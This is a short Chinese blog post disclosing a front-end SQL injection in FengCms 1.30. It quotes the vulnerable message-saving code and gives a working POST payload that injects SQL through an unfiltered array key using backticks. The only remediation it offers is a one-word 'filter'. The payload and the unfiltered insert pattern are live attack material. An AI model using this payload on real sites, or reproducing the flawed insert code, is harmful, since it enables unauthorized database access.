FengCms1.30注入(前台) – 网站安全 – 自学php网

时间: 2020-10-10|tag: 36次围观|0 条评论

http://www.fengcms.com/

app\model\messageModel.php

public function save($array){
if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;}
unset($array['vcode']);
$re=D($this->d_name)->insert($array);

if($re){
$_SESSION['authnum']="";
return array('status' => 'y','id' => $re);

}else{

return array('status' => 'n','id' => $re);
}

$re=D($this->d_name)->insert($array);

未对数组key过滤。

反引号无视转义。

pyload:

POST /?controller=message&operate=save

title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319

 

FengCms1.30注入(前台) – 网站安全 – 自学php网插图

 

FengCms1.30注入(前台) – 网站安全 – 自学php网插图1

 

FengCms1.30注入(前台) – 网站安全 – 自学php网插图2

 

解决方案:

过滤~

 

    上一篇: Coremail某功能多处存储型XSS漏洞 - 网站安全 - 自学php网

    下一篇: web安全工程师--成长记录 - 网站安全 - 自学php网
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《FengCms1.30注入(前台) – 网站安全 – 自学php网
   

还没有人抢沙发呢~